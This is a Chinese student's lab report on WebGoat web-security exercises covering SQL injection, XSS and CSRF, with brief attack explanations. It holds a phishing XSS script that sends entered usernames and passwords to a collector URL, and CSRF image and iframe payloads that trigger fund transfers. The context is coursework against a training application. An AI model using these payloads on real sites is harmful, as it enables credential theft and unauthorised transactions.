其他分享
首页 > 其他分享> > 2019-2020 20174318张致豪《网络对抗技术》Exp9 Web安全

2019-2020 20174318张致豪《网络对抗技术》Exp9 Web安全

作者:互联网

Exp8 Web基础

前期准备


一、实验目标与基础知识

1.1 实践目标

1.2 基础知识

SQL注入

XSS攻击

CSRF(Cross-site request forgery)

实验步骤


一、WebGoat

JAVA_HOME=/usr/local/java/jdk1.8.0_161
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH

 

二、SQL注入攻击(Injection Flaws)

1.Command Injection(命令注入)

操作方法:

2、Numeric SQL Injection(数字型SQL注入)

SELECT * FROM weather_data WHERE station = [station]

操作方法:

3、Log Spoofing(日志欺骗)

操作方法:

4、String SQL Injection(字符串型注入)

操作方法:

5、LAB: SQL Injection

操作方法:

6、Database Backdoors(数据库后门)

操作方法:

7、Blind Numeric SQL Injection(数字型盲注入)

操作方法:

8、Blind String SQL Injection(字符串型盲注入)

操作方法:

三、XSS攻击

1、Phishing with XSS 跨站脚本钓鱼攻击

<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;"></div>
<div style="float:left;height:100px;width:50%;"></div>
</div>
<div style="height:200px;clear:both;"></div>
 
</div></div>
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>

2、存储型XSS攻击(Stored XSS Attacks)

操作方法:

3、反射型XSS攻击(Reflected XSS Attacks)

操作方法:

四、CSRF攻击

1、跨站请求伪造(Cross Site Request Forgery (CSRF))

<imgsrc="https://www.mybank.com/me?transferFunds=5000&to=123456"/>

操作方法:

2、绕过 CSRF 确认( CSRF Prompt By‐Pass)

操作方法:

<iframe src="attack?Screen=326&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=326&menu=900&transferFunds=CONFIRM"> </iframe>

实验总结


一、基础问题回答 

(1)SQL注入攻击原理,如何防御

『 SQL注入攻击是把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,来达到欺骗服务器执行恶意SQL命令的目的。

防御方式:

(2)XSS攻击的原理,如何防御

『 XSS攻击是利用网页开发时留下的漏洞,将恶意代码植入网页,使用户加载并执行攻击者恶意制造的网页程序。攻击成功后,可以进行越权操作、获取私密网页内容、会话和cookie等各种内容

防御方式:

(3)CSRF攻击原理,如何防御

『 CSRF攻击是通过伪装成受信任的用户,利用他们的请求来访问攻击受信任的网站

防御方式:

二、实验总结与体会

       本次实验通过WebGoat学习了SQL、XSS、CRSF相关的知识,了解了关于它们的多种攻击方式,实验做完后就感觉上网被攻击的风险挺大的,平时更是需要注意保护个人的信息。

       本次实验做完后终于不用写博客了。通过一系列的学习,本学习对网络攻防有了进一步的理解与掌握,本来对这门学科是没有什么主观上的看法的,好多的东西之前都没有接触过,在各个实验与课堂里,慢慢接触后发现这门课是非常有趣的,那些看似复杂的语句、看似晦涩的知识,实际上都很好理解。虽然实验做完了,但学习并没有结束,也希望在日后能用到本学期实验中的相关知识理论与技术手段。

标签:XSS,Exp9,Web,攻击,2020,CSRF,SQL,输入,页面
来源: https://www.cnblogs.com/zzh1999/p/12943992.html